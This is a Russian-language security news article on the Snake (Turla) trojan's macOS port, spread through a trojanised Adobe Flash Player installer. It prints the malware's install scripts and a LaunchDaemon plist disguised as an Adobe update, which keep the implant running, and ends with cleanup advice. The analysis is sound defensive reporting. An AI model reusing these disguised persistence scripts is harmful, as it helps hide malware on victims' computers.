Широкоизвестная вредоносная программа «Snake» была портирована на Mac

Snake, также известный как Turla, Uroburos и Agent.BTZ, является сложным вредоносным фреймворком для направленных атак. Ранее фреймворк был нацелен только на Windows. В 2014 году его версия появилась и на Linux-системах. Теперь же появилась и модификация для macOS.

О вирусе Snake

По мнению экспертов из Fox-IT и Palo Alto Networks, троян был разработан российской группировкой Turla. Вирус является заменой трояну Uroburos, который был уничтожен в 2014 году исследователями из G Data. Троян разработан с помощью .NET Framework, существуют версии для Windows, Mac и Linux. Версия для Windows была названа Kazuar, исходный код которой указывает на существование этого вируса для Linux. Mac-версия же получила название Snake.

Принцип работы

Данный вирус работает по известному принципу. Он обращается за командами к C&C-серверу по вшитому адресу. Особенностью этого трояна является команда remote. Она запускает web-сервер на зараженном хосте, предоставляя API для удаленных соединений. Таким образом атакующий сервер может в любое время отправлять команды вирусу.

У такого подхода есть два плюса:

1. Возможность для атакующего сервера мигрировать на другой C&C-сервер.
2. Вирус способен обходить некоторые решения безопасности.

Функциональность

Для версии под Windows архитектура Snake состояла из драйвера ядра, который скрывал присутствие компонентов Snake и предоставлял низкоуровневый доступ к сетям.

Версия для macOS является портом с Windows. По прежнему присутствуют ссылки в двоичном виде на проводник, Internet Explorer и именованные каналы.

Установка

Код Snake находится внутри архива Adobe Flash Player.app.zip, который является взломанной версией установщика Flash Player.

Код скрипта install.sh:

			#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/installd.sh" "${TARGET_PATH}/installd.sh"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/installd.sh"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RC
		

Вызываемый файл installd.sh cодержит следующий код:

			#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
${SCRIPT_DIR}/installdp ${FILE} n
fi
		

Оболочка скрипта проверяет, запущен ли installdp, и запускает его в обратном случае:

			/Library/Scripts/installdp /Library/Scripts/queue#1 n
		

Поддержка

Лазейка поддерживается с помощью службы LaunchDaemon:

			$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist
{
"ProgramArguments" => [
0 => "/Library/Scripts/installd.sh"
]
"KeepAlive" => 1
"Label" => "com.apple.update"
"OnDemand" => 1
"POSIXSpawnType" => "Interactive"
}
		

Влияние

Apple весьма быстро решили проблему с этим вирусом путем отмены сертификата, поэтому данный установщик не несет никакой опасности.

Однако, если вы были инфицированы, то стоит помнить, что могли быть украдены ваши файлы и пароли. В связи с этим следует очистить компьютер от вируса, а затем заменить все свои пароли.